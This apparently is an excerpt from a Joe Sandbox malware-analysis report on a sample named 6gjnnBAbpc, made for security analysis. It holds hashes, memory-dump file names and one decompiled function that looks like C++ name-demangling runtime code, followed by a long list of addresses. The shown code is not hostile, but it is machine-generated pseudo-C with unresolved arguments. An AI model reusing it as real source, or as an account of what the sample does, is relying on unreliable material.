                                                                                                                                                                                                                                                                                                        • Instruction ID: ef56fa0fe3e4a126f61911e2a387ce4b2f316110e497464169164f036395c722
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b95072503d289b122270171115fbda5e346781793e070ee70b941499e8d717ba
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7312DB2208701CBC710AF69D4C072BBBE5EBD5364F140A3EE994A73D0D779D8458B9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E0040B820(signed char __eax, signed char* __ecx, signed char* __edx) {
                                                                                                                                                                                                                                                                                                        				signed char _t104;
                                                                                                                                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                                                                                                                        				signed char _t113;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t117;
                                                                                                                                                                                                                                                                                                        				void* _t120;
                                                                                                                                                                                                                                                                                                        				signed char _t121;
                                                                                                                                                                                                                                                                                                        				int _t125;
                                                                                                                                                                                                                                                                                                        				signed char _t126;
                                                                                                                                                                                                                                                                                                        				signed char* _t137;
                                                                                                                                                                                                                                                                                                        				char* _t138;
                                                                                                                                                                                                                                                                                                        				signed char* _t139;
                                                                                                                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                                                                                                                        				signed int _t141;
                                                                                                                                                                                                                                                                                                        				signed char _t149;
                                                                                                                                                                                                                                                                                                        				signed char _t151;
                                                                                                                                                                                                                                                                                                        				signed int _t152;
                                                                                                                                                                                                                                                                                                        				signed char _t153;
                                                                                                                                                                                                                                                                                                        				signed char _t159;
                                                                                                                                                                                                                                                                                                        				signed int _t161;
                                                                                                                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                                                                                                                        				signed char _t163;
                                                                                                                                                                                                                                                                                                        				signed char* _t167;
                                                                                                                                                                                                                                                                                                        				signed char* _t168;
                                                                                                                                                                                                                                                                                                        				signed char* _t169;
                                                                                                                                                                                                                                                                                                        				signed char* _t170;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t172;
                                                                                                                                                                                                                                                                                                        				signed char* _t173;
                                                                                                                                                                                                                                                                                                        				void* _t174;
                                                                                                                                                                                                                                                                                                        				signed char** _t175;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t104 = __eax;
                                                                                                                                                                                                                                                                                                        				_t137 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t175 = _t174 - 0x4c;
                                                                                                                                                                                                                                                                                                        				_t175[5] = __edx;
                                                                                                                                                                                                                                                                                                        				_t170 = _t175[0x18];
                                                                                                                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					return _t104;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t169 = __eax;
                                                                                                                                                                                                                                                                                                        					_t104 =  *(__eax + 0x118);
                                                                                                                                                                                                                                                                                                        					if(_t104 == 0) {
                                                                                                                                                                                                                                                                                                        						do {
                                                                                                                                                                                                                                                                                                        							if(_t137[8] != 0) {
                                                                                                                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                                                                                                                        								_t137 =  *_t137;
                                                                                                                                                                                                                                                                                                        								if(_t137 != 0) {
                                                                                                                                                                                                                                                                                                        									goto L3;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t143 = _t137[4];
                                                                                                                                                                                                                                                                                                        								_t104 =  *(_t137[4]);
                                                                                                                                                                                                                                                                                                        								if(_t170 != 0 || _t104 - 0x1c > 4) {
                                                                                                                                                                                                                                                                                                        									_t137[8] = 1;
                                                                                                                                                                                                                                                                                                        									_t167 = _t169[0x110];
                                                                                                                                                                                                                                                                                                        									_t169[0x110] = _t137[0xc];
                                                                                                                                                                                                                                                                                                        									if(_t104 == 0x29) {
                                                                                                                                                                                                                                                                                                        										 *_t175 =  *_t137;
                                                                                                                                                                                                                                                                                                        										_t107 = E0040BE20(_t169, _t143 + 8, _t175[5]);
                                                                                                                                                                                                                                                                                                        										_t169[0x110] = _t167;
                                                                                                                                                                                                                                                                                                        										return _t107;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										if(_t104 == 0x2a) {
                                                                                                                                                                                                                                                                                                        											 *_t175 =  *_t137;
                                                                                                                                                                                                                                                                                                        											_t110 = E0040BBA0(_t169, _t143 + 4, _t175[5]);
                                                                                                                                                                                                                                                                                                        											_t169[0x110] = _t167;
                                                                                                                                                                                                                                                                                                        											return _t110;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											if(_t104 == 2) {
                                                                                                                                                                                                                                                                                                        												_t169[0x114] = 0;
                                                                                                                                                                                                                                                                                                        												E0040B090(_t169,  *((intOrPtr*)(_t143 + 4)), _t175[5]);
                                                                                                                                                                                                                                                                                                        												_t113 = _t169[0x100];
                                                                                                                                                                                                                                                                                                        												if((_t175[5] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        													if(_t113 == 0xff) {
                                                                                                                                                                                                                                                                                                        														_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        														_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        														 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        														_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        														_t169[0x108]();
                                                                                                                                                                                                                                                                                                        														_t159 = 1;
                                                                                                                                                                                                                                                                                                        														_t113 = 0;
                                                                                                                                                                                                                                                                                                        														_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														_t159 = _t113 + 1;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t169[0x100] = _t159;
                                                                                                                                                                                                                                                                                                        													_t169[_t113] = 0x2e;
                                                                                                                                                                                                                                                                                                        													_t169[0x104] = 0x2e;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													_t173 = 0x41fa44;
                                                                                                                                                                                                                                                                                                        													_t175[6] = _t137;
                                                                                                                                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                                                                                                                                        														_t141 =  *_t173 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        														if(_t113 != 0xff) {
                                                                                                                                                                                                                                                                                                        															_t153 = _t113 + 1;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        															_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        															 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        															_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        															_t169[0x108]();
                                                                                                                                                                                                                                                                                                        															_t153 = 1;
                                                                                                                                                                                                                                                                                                        															_t113 = 0;
                                                                                                                                                                                                                                                                                                        															_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t173 =  &(_t173[1]);
                                                                                                                                                                                                                                                                                                        														_t169[0x100] = _t153;
                                                                                                                                                                                                                                                                                                        														_t169[_t113] = _t141;
                                                                                                                                                                                                                                                                                                        														_t169[0x104] = _t141;
                                                                                                                                                                                                                                                                                                        														if(_t173 == 0x41fa46) {
                                                                                                                                                                                                                                                                                                        															break;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t113 = _t153;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t137 = _t175[6];
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												_t172 =  *((intOrPtr*)(_t137[4] + 8));
                                                                                                                                                                                                                                                                                                        												_t117 =  *_t172;
                                                                                                                                                                                                                                                                                                        												if(_t117 == 0x45) {
                                                                                                                                                                                                                                                                                                        													_t121 = _t169[0x100];
                                                                                                                                                                                                                                                                                                        													_t138 = "{default arg#";
                                                                                                                                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                                                                                                                                        														_t161 =  *_t138 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        														if(_t121 != 0xff) {
                                                                                                                                                                                                                                                                                                        															_t149 = _t121 + 1;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        															_t175[6] = _t161;
                                                                                                                                                                                                                                                                                                        															_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        															_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        															 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        															_t169[0x108]();
                                                                                                                                                                                                                                                                                                        															_t149 = 1;
                                                                                                                                                                                                                                                                                                        															_t121 = 0;
                                                                                                                                                                                                                                                                                                        															_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        															_t161 = _t175[6];
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t138 =  &(_t138[1]);
                                                                                                                                                                                                                                                                                                        														_t169[0x100] = _t149;
                                                                                                                                                                                                                                                                                                        														_t169[_t121] = _t161;
                                                                                                                                                                                                                                                                                                        														_t169[0x104] = _t161;
                                                                                                                                                                                                                                                                                                        														if(_t138 == 0x41fa54) {
                                                                                                                                                                                                                                                                                                        															break;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t121 = _t149;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t139 =  &(_t175[9]);
                                                                                                                                                                                                                                                                                                        													_t175[1] = "%ld";
                                                                                                                                                                                                                                                                                                        													 *_t175 = _t139;
                                                                                                                                                                                                                                                                                                        													_t175[2] =  *((intOrPtr*)(_t172 + 8)) + 1;
                                                                                                                                                                                                                                                                                                        													sprintf(??, ??);
                                                                                                                                                                                                                                                                                                        													 *_t175 = _t139;
                                                                                                                                                                                                                                                                                                        													_t125 = strlen(??);
                                                                                                                                                                                                                                                                                                        													if(_t125 == 0) {
                                                                                                                                                                                                                                                                                                        														_t126 = _t169[0x100];
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														_t163 = _t169[0x100];
                                                                                                                                                                                                                                                                                                        														_t175[6] = _t167;
                                                                                                                                                                                                                                                                                                        														_t168 =  &(_t139[_t125]);
                                                                                                                                                                                                                                                                                                        														while(1) {
                                                                                                                                                                                                                                                                                                        															_t152 =  *_t139 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        															if(_t163 != 0xff) {
                                                                                                                                                                                                                                                                                                        																_t126 = _t163 + 1;
                                                                                                                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                                                                                                                        																_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        																_t175[7] = _t152;
                                                                                                                                                                                                                                                                                                        																_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        																_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        																 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        																_t169[0x108]();
                                                                                                                                                                                                                                                                                                        																_t126 = 1;
                                                                                                                                                                                                                                                                                                        																_t163 = 0;
                                                                                                                                                                                                                                                                                                        																_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        																_t152 = _t175[7];
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															_t139 =  &(_t139[1]);
                                                                                                                                                                                                                                                                                                        															_t169[0x100] = _t126;
                                                                                                                                                                                                                                                                                                        															_t169[_t163] = _t152;
                                                                                                                                                                                                                                                                                                        															_t169[0x104] = _t152;
                                                                                                                                                                                                                                                                                                        															if(_t139 == _t168) {
                                                                                                                                                                                                                                                                                                        																break;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															_t163 = _t126;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t167 = _t175[6];
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t140 = "}::";
                                                                                                                                                                                                                                                                                                        													while(1) {
                                                                                                                                                                                                                                                                                                        														_t162 =  *_t140 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        														if(_t126 != 0xff) {
                                                                                                                                                                                                                                                                                                        															_t151 = _t126 + 1;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t169[0xff] = 0;
                                                                                                                                                                                                                                                                                                        															_t175[6] = _t162;
                                                                                                                                                                                                                                                                                                        															_t175[1] = 0xff;
                                                                                                                                                                                                                                                                                                        															_t175[2] = _t169[0x10c];
                                                                                                                                                                                                                                                                                                        															 *_t175 = _t169;
                                                                                                                                                                                                                                                                                                        															_t169[0x108]();
                                                                                                                                                                                                                                                                                                        															_t151 = 1;
                                                                                                                                                                                                                                                                                                        															_t126 = 0;
                                                                                                                                                                                                                                                                                                        															_t169[0x120] = _t169[0x120] + 1;
                                                                                                                                                                                                                                                                                                        															_t162 = _t175[6];
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														_t140 =  &(_t140[1]);
                                                                                                                                                                                                                                                                                                        														_t169[0x100] = _t151;
                                                                                                                                                                                                                                                                                                        														_t169[_t126] = _t162;
                                                                                                                                                                                                                                                                                                        														_t169[0x104] = _t162;
                                                                                                                                                                                                                                                                                                        														if(_t140 == 0x41fa5c) {
                                                                                                                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                                                                                                                        															_t172 =  *((intOrPtr*)(_t172 + 4));
                                                                                                                                                                                                                                                                                                        															_t117 =  *_t172;
                                                                                                                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t126 = _t151;
                                                                                                                                                                                                                                                                                                        															continue;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														L30:
                                                                                                                                                                                                                                                                                                        														_t120 = E0040B090(_t169, _t172, _t175[5]);
                                                                                                                                                                                                                                                                                                        														_t169[0x110] = _t167;
                                                                                                                                                                                                                                                                                                        														return _t120;
                                                                                                                                                                                                                                                                                                        														goto L53;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												L29:
                                                                                                                                                                                                                                                                                                        												if(_t117 - 0x1c <= 4) {
                                                                                                                                                                                                                                                                                                        													goto L28;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												_t104 = E0040B0B0(_t169, _t143, _t175[5]);
                                                                                                                                                                                                                                                                                                        												_t169[0x110] = _t167;
                                                                                                                                                                                                                                                                                                        												goto L11;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L11;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L53;
                                                                                                                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                                                                                                                        							_t104 = _t169[0x118];
                                                                                                                                                                                                                                                                                                        						} while (_t104 == 0);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L53:
                                                                                                                                                                                                                                                                                                        			}

































                                                                                                                                                                                                                                                                                                        0x0040b820
                                                                                                                                                                                                                                                                                                        0x0040b824
                                                                                                                                                                                                                                                                                                        0x0040b826
                                                                                                                                                                                                                                                                                                        0x0040b82b
                                                                                                                                                                                                                                                                                                        0x0040b82f
                                                                                                                                                                                                                                                                                                        0x0040b833
                                                                                                                                                                                                                                                                                                        0x0040b8a1
                                                                                                                                                                                                                                                                                                        0x0040b8a8
                                                                                                                                                                                                                                                                                                        0x0040b835
                                                                                                                                                                                                                                                                                                        0x0040b835
                                                                                                                                                                                                                                                                                                        0x0040b837
                                                                                                                                                                                                                                                                                                        0x0040b83f
                                                                                                                                                                                                                                                                                                        0x0040b84d
                                                                                                                                                                                                                                                                                                        0x0040b852
                                                                                                                                                                                                                                                                                                        0x0040b89b
                                                                                                                                                                                                                                                                                                        0x0040b89b
                                                                                                                                                                                                                                                                                                        0x0040b89f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b854
                                                                                                                                                                                                                                                                                                        0x0040b854
                                                                                                                                                                                                                                                                                                        0x0040b859
                                                                                                                                                                                                                                                                                                        0x0040b85b
                                                                                                                                                                                                                                                                                                        0x0040b86b
                                                                                                                                                                                                                                                                                                        0x0040b872
                                                                                                                                                                                                                                                                                                        0x0040b878
                                                                                                                                                                                                                                                                                                        0x0040b87e
                                                                                                                                                                                                                                                                                                        0x0040b8b2
                                                                                                                                                                                                                                                                                                        0x0040b8b7
                                                                                                                                                                                                                                                                                                        0x0040b8bc
                                                                                                                                                                                                                                                                                                        0x0040b8c9
                                                                                                                                                                                                                                                                                                        0x0040b880
                                                                                                                                                                                                                                                                                                        0x0040b883
                                                                                                                                                                                                                                                                                                        0x0040b8d3
                                                                                                                                                                                                                                                                                                        0x0040b8d8
                                                                                                                                                                                                                                                                                                        0x0040b8dd
                                                                                                                                                                                                                                                                                                        0x0040b8ea
                                                                                                                                                                                                                                                                                                        0x0040b885
                                                                                                                                                                                                                                                                                                        0x0040b888
                                                                                                                                                                                                                                                                                                        0x0040b8f3
                                                                                                                                                                                                                                                                                                        0x0040b904
                                                                                                                                                                                                                                                                                                        0x0040b909
                                                                                                                                                                                                                                                                                                        0x0040b91a
                                                                                                                                                                                                                                                                                                        0x0040b988
                                                                                                                                                                                                                                                                                                        0x0040b9e3
                                                                                                                                                                                                                                                                                                        0x0040b9ea
                                                                                                                                                                                                                                                                                                        0x0040b9f2
                                                                                                                                                                                                                                                                                                        0x0040b9f5
                                                                                                                                                                                                                                                                                                        0x0040b9f9
                                                                                                                                                                                                                                                                                                        0x0040b9ff
                                                                                                                                                                                                                                                                                                        0x0040ba04
                                                                                                                                                                                                                                                                                                        0x0040ba06
                                                                                                                                                                                                                                                                                                        0x0040b98a
                                                                                                                                                                                                                                                                                                        0x0040b98a
                                                                                                                                                                                                                                                                                                        0x0040b98a
                                                                                                                                                                                                                                                                                                        0x0040b98d
                                                                                                                                                                                                                                                                                                        0x0040b993
                                                                                                                                                                                                                                                                                                        0x0040b997
                                                                                                                                                                                                                                                                                                        0x0040b91c
                                                                                                                                                                                                                                                                                                        0x0040b91c
                                                                                                                                                                                                                                                                                                        0x0040b921
                                                                                                                                                                                                                                                                                                        0x0040b946
                                                                                                                                                                                                                                                                                                        0x0040b94b
                                                                                                                                                                                                                                                                                                        0x0040b94f
                                                                                                                                                                                                                                                                                                        0x0040b927
                                                                                                                                                                                                                                                                                                        0x0040b951
                                                                                                                                                                                                                                                                                                        0x0040b957
                                                                                                                                                                                                                                                                                                        0x0040b95e
                                                                                                                                                                                                                                                                                                        0x0040b966
                                                                                                                                                                                                                                                                                                        0x0040b969
                                                                                                                                                                                                                                                                                                        0x0040b96d
                                                                                                                                                                                                                                                                                                        0x0040b973
                                                                                                                                                                                                                                                                                                        0x0040b978
                                                                                                                                                                                                                                                                                                        0x0040b97a
                                                                                                                                                                                                                                                                                                        0x0040b97a
                                                                                                                                                                                                                                                                                                        0x0040b92a
                                                                                                                                                                                                                                                                                                        0x0040b933
                                                                                                                                                                                                                                                                                                        0x0040b939
                                                                                                                                                                                                                                                                                                        0x0040b93c
                                                                                                                                                                                                                                                                                                        0x0040b942
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b944
                                                                                                                                                                                                                                                                                                        0x0040b944
                                                                                                                                                                                                                                                                                                        0x0040b9a0
                                                                                                                                                                                                                                                                                                        0x0040b9a0
                                                                                                                                                                                                                                                                                                        0x0040b9a7
                                                                                                                                                                                                                                                                                                        0x0040b9aa
                                                                                                                                                                                                                                                                                                        0x0040b9b0
                                                                                                                                                                                                                                                                                                        0x0040ba17
                                                                                                                                                                                                                                                                                                        0x0040ba1d
                                                                                                                                                                                                                                                                                                        0x0040ba40
                                                                                                                                                                                                                                                                                                        0x0040ba45
                                                                                                                                                                                                                                                                                                        0x0040ba48
                                                                                                                                                                                                                                                                                                        0x0040ba21
                                                                                                                                                                                                                                                                                                        0x0040ba4a
                                                                                                                                                                                                                                                                                                        0x0040ba50
                                                                                                                                                                                                                                                                                                        0x0040ba57
                                                                                                                                                                                                                                                                                                        0x0040ba5b
                                                                                                                                                                                                                                                                                                        0x0040ba63
                                                                                                                                                                                                                                                                                                        0x0040ba67
                                                                                                                                                                                                                                                                                                        0x0040ba6a
                                                                                                                                                                                                                                                                                                        0x0040ba70
                                                                                                                                                                                                                                                                                                        0x0040ba75
                                                                                                                                                                                                                                                                                                        0x0040ba77
                                                                                                                                                                                                                                                                                                        0x0040ba7e
                                                                                                                                                                                                                                                                                                        0x0040ba7e
                                                                                                                                                                                                                                                                                                        0x0040ba24
                                                                                                                                                                                                                                                                                                        0x0040ba2d
                                                                                                                                                                                                                                                                                                        0x0040ba33
                                                                                                                                                                                                                                                                                                        0x0040ba36
                                                                                                                                                                                                                                                                                                        0x0040ba3c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040ba3e
                                                                                                                                                                                                                                                                                                        0x0040ba3e
                                                                                                                                                                                                                                                                                                        0x0040ba87
                                                                                                                                                                                                                                                                                                        0x0040ba8b
                                                                                                                                                                                                                                                                                                        0x0040ba93
                                                                                                                                                                                                                                                                                                        0x0040ba99
                                                                                                                                                                                                                                                                                                        0x0040ba9d
                                                                                                                                                                                                                                                                                                        0x0040baa2
                                                                                                                                                                                                                                                                                                        0x0040baa5
                                                                                                                                                                                                                                                                                                        0x0040baac
                                                                                                                                                                                                                                                                                                        0x0040bb96
                                                                                                                                                                                                                                                                                                        0x0040bab2
                                                                                                                                                                                                                                                                                                        0x0040bab4
                                                                                                                                                                                                                                                                                                        0x0040baba
                                                                                                                                                                                                                                                                                                        0x0040babe
                                                                                                                                                                                                                                                                                                        0x0040badd
                                                                                                                                                                                                                                                                                                        0x0040bae3
                                                                                                                                                                                                                                                                                                        0x0040bae6
                                                                                                                                                                                                                                                                                                        0x0040bac2
                                                                                                                                                                                                                                                                                                        0x0040bae8
                                                                                                                                                                                                                                                                                                        0x0040baee
                                                                                                                                                                                                                                                                                                        0x0040baf5
                                                                                                                                                                                                                                                                                                        0x0040baf9
                                                                                                                                                                                                                                                                                                        0x0040bb01
                                                                                                                                                                                                                                                                                                        0x0040bb05
                                                                                                                                                                                                                                                                                                        0x0040bb08
                                                                                                                                                                                                                                                                                                        0x0040bb0e
                                                                                                                                                                                                                                                                                                        0x0040bb13
                                                                                                                                                                                                                                                                                                        0x0040bb15
                                                                                                                                                                                                                                                                                                        0x0040bb1c
                                                                                                                                                                                                                                                                                                        0x0040bb1c
                                                                                                                                                                                                                                                                                                        0x0040bac5
                                                                                                                                                                                                                                                                                                        0x0040baca
                                                                                                                                                                                                                                                                                                        0x0040bad0
                                                                                                                                                                                                                                                                                                        0x0040bad3
                                                                                                                                                                                                                                                                                                        0x0040bad9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040badb
                                                                                                                                                                                                                                                                                                        0x0040badb
                                                                                                                                                                                                                                                                                                        0x0040bb22
                                                                                                                                                                                                                                                                                                        0x0040bb22
                                                                                                                                                                                                                                                                                                        0x0040bb2b
                                                                                                                                                                                                                                                                                                        0x0040bb52
                                                                                                                                                                                                                                                                                                        0x0040bb57
                                                                                                                                                                                                                                                                                                        0x0040bb5a
                                                                                                                                                                                                                                                                                                        0x0040bb2f
                                                                                                                                                                                                                                                                                                        0x0040bb5c
                                                                                                                                                                                                                                                                                                        0x0040bb62
                                                                                                                                                                                                                                                                                                        0x0040bb69
                                                                                                                                                                                                                                                                                                        0x0040bb6d
                                                                                                                                                                                                                                                                                                        0x0040bb75
                                                                                                                                                                                                                                                                                                        0x0040bb79
                                                                                                                                                                                                                                                                                                        0x0040bb7c
                                                                                                                                                                                                                                                                                                        0x0040bb82
                                                                                                                                                                                                                                                                                                        0x0040bb87
                                                                                                                                                                                                                                                                                                        0x0040bb89
                                                                                                                                                                                                                                                                                                        0x0040bb90
                                                                                                                                                                                                                                                                                                        0x0040bb90
                                                                                                                                                                                                                                                                                                        0x0040bb32
                                                                                                                                                                                                                                                                                                        0x0040bb3b
                                                                                                                                                                                                                                                                                                        0x0040bb41
                                                                                                                                                                                                                                                                                                        0x0040bb44
                                                                                                                                                                                                                                                                                                        0x0040bb4a
                                                                                                                                                                                                                                                                                                        0x0040b9b4
                                                                                                                                                                                                                                                                                                        0x0040b9b4
                                                                                                                                                                                                                                                                                                        0x0040b9b7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040bb50
                                                                                                                                                                                                                                                                                                        0x0040bb50
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040bb50
                                                                                                                                                                                                                                                                                                        0x0040b9c2
                                                                                                                                                                                                                                                                                                        0x0040b9ca
                                                                                                                                                                                                                                                                                                        0x0040b9cf
                                                                                                                                                                                                                                                                                                        0x0040b9dc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b9dc
                                                                                                                                                                                                                                                                                                        0x0040bb52
                                                                                                                                                                                                                                                                                                        0x0040b9ba
                                                                                                                                                                                                                                                                                                        0x0040b9c0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b88a
                                                                                                                                                                                                                                                                                                        0x0040b890
                                                                                                                                                                                                                                                                                                        0x0040b895
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b895
                                                                                                                                                                                                                                                                                                        0x0040b888
                                                                                                                                                                                                                                                                                                        0x0040b883
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b85b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b843
                                                                                                                                                                                                                                                                                                        0x0040b843
                                                                                                                                                                                                                                                                                                        0x0040b849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b841
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040b83f
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: {default arg#$}::
                                                                                                                                                                                                                                                                                                        • API String ID: 0-3706473490
                                                                                                                                                                                                                                                                                                        • Opcode ID: f6a5695efae2835f33b0a44589fd0ae4fef321bba4350e7326e33b460c672c70
